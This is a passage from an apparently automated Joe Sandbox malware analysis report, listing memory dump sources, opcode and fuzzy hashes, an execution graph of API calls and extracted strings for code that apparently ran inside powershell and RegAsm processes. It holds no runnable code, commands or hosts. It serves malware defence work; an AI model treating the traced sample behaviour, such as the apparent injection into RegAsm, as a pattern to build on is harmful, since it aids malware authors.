                  • Instruction Fuzzy Hash: 9F018471504340AAE7105E15E884B66BF98DF81724F28851BFD454A386C779D845C6B1
                  Memory Dump Source
                  • Source File: 0000000A.00000002.473285744.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_1dd000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0a0e8977f79347397492ec2829341cca76316bfeb894bb099ea096181776c5f7
                  • Instruction ID: 66e44b1ace3e5e2918ef7077f54dbf859b6869924ca01287125cfab328f5e0eb
                  • Opcode Fuzzy Hash: 0a0e8977f79347397492ec2829341cca76316bfeb894bb099ea096181776c5f7
                  • Instruction Fuzzy Hash: 2601526140D3C09FD7124B259C94B66BFA4DF53224F1981DBE8848F297C2699C48C772
                  Strings
                  Memory Dump Source
                  • Source File: 0000000A.00000002.473457127.0000000000410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00410000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_410000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'p$4'p$4'p$4'p$4'p$4'p$@<*$tPp$tPp$|:-$$p$$p$$p$$p
                  • API String ID: 0-4185152963
                  • Opcode ID: 8a44dc117562e711062b7996a78359611e342b7d4db347104948765b8f226da8
                  • Instruction ID: f19e6185609b48cc367bdf49da78ea8b2688d12853bc26b7307ed09bef8dada8
                  • Opcode Fuzzy Hash: 8a44dc117562e711062b7996a78359611e342b7d4db347104948765b8f226da8
                  • Instruction Fuzzy Hash: 93C1EC31B043458FCB258B69D4547ABBFB2AFC5310F28806BDA45CB361DA75DC82C7A6
                  Strings
                  Memory Dump Source
                  • Source File: 0000000A.00000002.473457127.0000000000410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00410000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_410000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'p$4'p$L4p$L4p$L4p$L4p$L4p$L4p$`8-$`8-$`8-$$p$$p
                  • API String ID: 0-2492973855
                  • Opcode ID: 8c129ae78efff6297bae420ba7d1e7e979375ab86449791c15a75519fe115f61
                  • Instruction ID: 6566645e1ecee703c9bf40c21a7c900a7da274285d665d66274adc1d5352116b
                  • Opcode Fuzzy Hash: 8c129ae78efff6297bae420ba7d1e7e979375ab86449791c15a75519fe115f61
                  • Instruction Fuzzy Hash: 20D10731B00244EFDB259E68D8547AF7BA2AF84310F148067E9458B395CBB9DDC1C796
                  Strings
                  Memory Dump Source
                  • Source File: 0000000A.00000002.473457127.0000000000410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00410000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_410000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: h%f$h%f$$p$$p$$p
                  • API String ID: 0-930881452
                  • Opcode ID: 51fda186839f8536205d93e480a805650e77ff9805d9fdf969791f0af4977b3a
                  • Instruction ID: bdb3e0c465c440f2330bd93444b5a9a06af0015ab3ff713328abb836d1936e7f
                  • Opcode Fuzzy Hash: 51fda186839f8536205d93e480a805650e77ff9805d9fdf969791f0af4977b3a
                  • Instruction Fuzzy Hash: 81513A317003059FCB248A798A007ABBBE2AFC1310F68807BD955D7355DAB9DC91C766
                  Strings
                  Memory Dump Source
                  • Source File: 0000000A.00000002.473457127.0000000000410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00410000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_410000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'p$4'p$$p$$p$$p
                  • API String ID: 0-2334450948
                  • Opcode ID: e63dae55076178febef80a600704e7f853a58f16af0845c8a8c97bf2f5fdb6f9
                  • Instruction ID: 1dd0fdb91ae2099a51d3267564970ae7dc51e41821c1adb2cad7856dfc64000b
                  • Opcode Fuzzy Hash: e63dae55076178febef80a600704e7f853a58f16af0845c8a8c97bf2f5fdb6f9
                  • Instruction Fuzzy Hash: BC410B31700201DFCB294A69CA516EBFBA2ABC1310F68806BD855C7291DFF8CCE1C755
                  Strings
                  Memory Dump Source
                  • Source File: 0000000A.00000002.473457127.0000000000410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00410000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_410000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: $p$$p$$p$$p
                  • API String ID: 0-3121760203
                  • Opcode ID: 4182578e86d0351a2358933fbce98312b1d12f5220c88e3ba93b64d071c8dcfc
                  • Instruction ID: dbef54423b97f21cb1228fad7a7a7284b7cc244eabf6185b4972620ed510c834
                  • Opcode Fuzzy Hash: 4182578e86d0351a2358933fbce98312b1d12f5220c88e3ba93b64d071c8dcfc
                  • Instruction Fuzzy Hash: B721D671A003059BEF309F14C8517FBBBA4ABD5310F28816BDA6486221D77889C2C76A
                  Strings
                  Memory Dump Source
                  • Source File: 0000000A.00000002.473457127.0000000000410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00410000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_410000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: $p$$p$$p$$p
                  • API String ID: 0-3121760203
                  • Opcode ID: de82872a13b65abc43404714b9b7153ba744bcf5e4b819f22af693700520ff0d
                  • Instruction ID: e3324b66903be95d8740c60c347dc528c5bc62f99e53c6c87064651effb1d420
                  • Opcode Fuzzy Hash: de82872a13b65abc43404714b9b7153ba744bcf5e4b819f22af693700520ff0d
                  • Instruction Fuzzy Hash: 7921F371A003059BEF30AF55C4507BBBBA4ABC5310F28816BDA2487321D779C9C1C7AA
                  Strings
                  Memory Dump Source
                  • Source File: 0000000A.00000002.473457127.0000000000410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00410000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_410000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: @<*$tPp$|:-$$p
                  • API String ID: 0-2927025094
                  • Opcode ID: fd910a79034d034f86c4ab0fdb68d68cc4fd42b9c1dae7625612f80920a90b9d
                  • Instruction ID: d21f409a95b63e25d06082cd833bbbecc93e6097b00e6c833e2bc24ffe0e2260
                  • Opcode Fuzzy Hash: fd910a79034d034f86c4ab0fdb68d68cc4fd42b9c1dae7625612f80920a90b9d
                  • Instruction Fuzzy Hash: 7911C470A80305EBC7308B55C945FABBAB6AF85710F54801BF6446F391E6B5DC80C7DA

                  Execution Graph

                  Execution Coverage:0.8%
                  Dynamic/Decrypted Code Coverage:4%
                  Signature Coverage:7%
                  Total number of Nodes:100
                  Total number of Limit Nodes:7
                  execution_graph 76769 42e243 76772 42d103 76769->76772 76775 42b5a3 76772->76775 76774 42d11c 76776 42b5c0 76775->76776 76777 42b5d1 RtlFreeHeap 76776->76777 76777->76774 76783 42e1e3 76784 42e1f3 76783->76784 76785 42e1f9 76783->76785 76788 42d1e3 76785->76788 76787 42e21f 76791 42b553 76788->76791 76790 42d1fe 76790->76787 76792 42b56d 76791->76792 76793 42b57e RtlAllocateHeap 76792->76793 76793->76790 76794 424063 76795 42407f 76794->76795 76796 4240a7 76795->76796 76797 4240bb 76795->76797 76798 42b243 NtClose 76796->76798 76804 42b243 76797->76804 76801 4240b0 76798->76801 76800 4240c4 76807 42d223 RtlAllocateHeap 76800->76807 76803 4240cf 76805 42b260 76804->76805 76806 42b271 NtClose 76805->76806 76806->76800 76807->76803 76849 42a853 76850 42a86d 76849->76850 76853 238fdc0 LdrInitializeThunk 76850->76853 76851 42a895 76853->76851 76854 4243f3 76859 424402 76854->76859 76855 424489 76856 424446 76857 42d103 RtlFreeHeap 76856->76857 76858 424456 76857->76858 76859->76855 76859->76856 76860 424484 76859->76860 76861 42d103 RtlFreeHeap 76860->76861 76861->76855 76862 413bd3 76866 413be6 76862->76866 76864 413c43 76865 413c3b 76866->76864 76867 41aef3 RtlFreeHeap LdrInitializeThunk 76866->76867 76867->76865 76868 41a313 76869 41a382 76868->76869 76870 41a32b 76868->76870 76870->76869 76872 41ded3 76870->76872 76873 41def9 76872->76873 76877 41dfe4 76873->76877 76878 42e313 76873->76878 76875 41df88 76875->76877 76884 42a8a3 76875->76884 76877->76869 76879 42e283 76878->76879 76880 42d1e3 RtlAllocateHeap 76879->76880 76881 42e2e0 76879->76881 76882 42e2bd 76880->76882 76881->76875 76883 42d103 RtlFreeHeap 76882->76883 76883->76881 76885 42a8bd 76884->76885 76888 238fae8 LdrInitializeThunk 76885->76888 76886 42a8e9 76886->76877 76888->76886 76808 238f9f0 LdrInitializeThunk 76889 416578 76892 42bc83 76889->76892 76891 416543 76894 42bc9b 76892->76894 76893 42bcbf 76893->76891 76894->76893 76895 42a8a3 LdrInitializeThunk 76894->76895 76896 42bd11 76895->76896 76897 42d103 RtlFreeHeap 76896->76897 76898 42bd26 76897->76898 76898->76891 76809 401b0c 76810 401b1a 76809->76810 76810->76810 76813 42e6a3 76810->76813 76816 42cd03 76813->76816 76817 42cd26 76816->76817 76818 401c0c 76817->76818 76824 41abe3 76817->76824 76820 42cd5b 76821 42cd70 76820->76821 76822 42b5f3 ExitProcess 76820->76822 76835 42b5f3 76821->76835 76822->76821 76825 41ac0f 76824->76825 76838 41aad3 76825->76838 76828 41ac54 76830 41ac70 76828->76830 76833 42b243 NtClose 76828->76833 76829 41ac3c 76831 41ac47 76829->76831 76832 42b243 NtClose 76829->76832 76830->76820 76831->76820 76832->76831 76834 41ac66 76833->76834 76834->76820 76836 42b60d 76835->76836 76837 42b61e ExitProcess 76836->76837 76837->76818 76839 41abc9 76838->76839 76840 41aaed 76838->76840 76839->76828 76839->76829 76844 42a943 76840->76844 76843 42b243 NtClose 76843->76839 76845 42a960 76844->76845 76848 23907ac LdrInitializeThunk 76845->76848 76846 41abbd 76846->76843 76848->76846

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 17 42b243-42b27f call 4048a3 call 42c303 NtClose
                  APIs
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572393778.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                  Yara matches
                  Similarity
                  • API ID: Close
                  • String ID:
                  • API String ID: 3535843008-0
                  • Opcode ID: 1a49dcd2fa2fd191c9fa89928bcabe8929124ccc95b17488bd063df14c852f8a
                  • Instruction ID: 8ebd411a675a57cb9febc90c854b01652b65c8de25e8449a58a7fa3da6a425b7
                  • Opcode Fuzzy Hash: 1a49dcd2fa2fd191c9fa89928bcabe8929124ccc95b17488bd063df14c852f8a
                  • Instruction Fuzzy Hash: FBE04F36200214BFD210FA5ADC41F9B776CDFC5714F408429FA18A7142C6B5791187F4

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 31 23907ac-23907c1 LdrInitializeThunk
                  APIs
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                  • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                  • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                  • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 28 238fae8-238fafd LdrInitializeThunk
                  APIs
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                  • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                  • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                  • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 29 238fb68-238fb7d LdrInitializeThunk
                  APIs
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                  • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                  • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                  • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 27 238f9f0-238fa05 LdrInitializeThunk
                  APIs
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                  • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                  • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                  • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 30 238fdc0-238fdd5 LdrInitializeThunk
                  APIs
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                  • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                  • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                  • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 0 42b5a3-42b5e7 call 4048a3 call 42c303 RtlFreeHeap
                  APIs
                  • RtlFreeHeap.NTDLL(o A,?,?,?,00000000,o A,?,0041206F,?,?), ref: 0042B5E2
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572393778.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeHeap
                  • String ID: o A
                  • API String ID: 3298025750-680853675
                  • Opcode ID: de19ce44512870e2162205c8267a6ebf18fa7d0170bf0287d817263a6b0b1701
                  • Instruction ID: 7704a5916971afe6c79771f618118e693fa90d66f1e0170d220e8bbe1a566b5b
                  • Opcode Fuzzy Hash: de19ce44512870e2162205c8267a6ebf18fa7d0170bf0287d817263a6b0b1701
                  • Instruction Fuzzy Hash: 4BE065B62042047BD614EE59DC41E9B33ACEFC4710F404419FA09A7281C770791086B4

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 12 42b553-42b594 call 4048a3 call 42c303 RtlAllocateHeap
                  APIs
                  • RtlAllocateHeap.NTDLL(?,0041DF88,?,?,00000000,?,0041DF88,?,?,?), ref: 0042B58F
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572393778.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: 4ce039a68f09330e86aed71a2b71b79f6057d74548956e20a3ec4c013b462def
                  • Instruction ID: 20975433eff8157ecc98bde545b07c4dfb8f87f2422970087598153362bef878
                  • Opcode Fuzzy Hash: 4ce039a68f09330e86aed71a2b71b79f6057d74548956e20a3ec4c013b462def
                  • Instruction Fuzzy Hash: A4E06D76204208BBD614EE59DC41FEB37ADEFC8714F00482DFA08A7281C6B0B9118AB4

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 22 42b5f3-42b62c call 4048a3 call 42c303 ExitProcess
                  APIs
                  • ExitProcess.KERNELBASE(?), ref: 0042B627
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572393778.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess
                  • String ID:
                  • API String ID: 621844428-0
                  • Opcode ID: fd3a33b4d30bea24ec625d6c3968355710f03ddfdae85561b387167d2180992c
                  • Instruction ID: a3587210c15bc6d786ef8bec8dafe98a2e19e7954fd7712ffe4184e85186e602
                  • Opcode Fuzzy Hash: fd3a33b4d30bea24ec625d6c3968355710f03ddfdae85561b387167d2180992c
                  • Instruction Fuzzy Hash: C6E086362052187BD510FB5ADC41FDB775CDFC5710F008819FA0867186C6B5B91187F4
                  Strings
                  • @, xrefs: 023D22A5
                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 023F5566
                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 023F5581
                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 023F5496
                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 023F551A
                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 023F5386
                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 023F5550
                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 023F53FD
                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 023F545F
                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 023F5586
                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 023F54E7
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                  • API String ID: 0-4009184096
                  • Opcode ID: a3a612912a56fcd706a5fdb97904acf77669f384212e4e1a3e6036e89e74a6b7
                  • Instruction ID: ab3a79aa969e3c92bb6333bdae8262f75e99869224565d3d72e3c91feb7c35ce
                  • Opcode Fuzzy Hash: a3a612912a56fcd706a5fdb97904acf77669f384212e4e1a3e6036e89e74a6b7
                  • Instruction Fuzzy Hash: 670239F29002289FDB71DF548C80BEAB7B9AF45304F4455EAE709A7612E7309E84CF59
                  Strings
                  • InstallLanguageFallback, xrefs: 0242B28C
                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0242B4C0
                  • LanguageConfiguration, xrefs: 0242B53A
                  • Control Panel\Desktop, xrefs: 0242B379
                  • LanguageConfigurationPending, xrefs: 0242B3DA
                  • PreferredUILanguagesPending, xrefs: 0242B3AC
                  • PreferredUILanguages, xrefs: 0242B4F5
                  • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!, xrefs: 0242ADC1
                  • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0242B25B
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!$Control Panel\Desktop$InstallLanguageFallback$LanguageConfiguration$LanguageConfigurationPending$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                  • API String ID: 0-257526532
                  • Opcode ID: 8cd31add5b30ad445bd9731e5f02e45847a836bea825eb70e406695c3c6eff87
                  • Instruction ID: 8b59b8b292a620c7cf40a615ec70ebd17b3d3cdc17a2bbb8a9f846c2c16cfb20
                  • Opcode Fuzzy Hash: 8cd31add5b30ad445bd9731e5f02e45847a836bea825eb70e406695c3c6eff87
                  • Instruction Fuzzy Hash: 18626F71D00229ABDF25DFA6C844BEEBBB9EF09708F94401AE941FB250D7749989CF50
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                  • Associated: 0000000C.00000002.572497070.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002460000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002470000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002474000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002477000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.0000000002480000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000C.00000002.572497070.00000000024E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_2370000_RegAsm.jbxd
                  Similarity
                  • API ID:
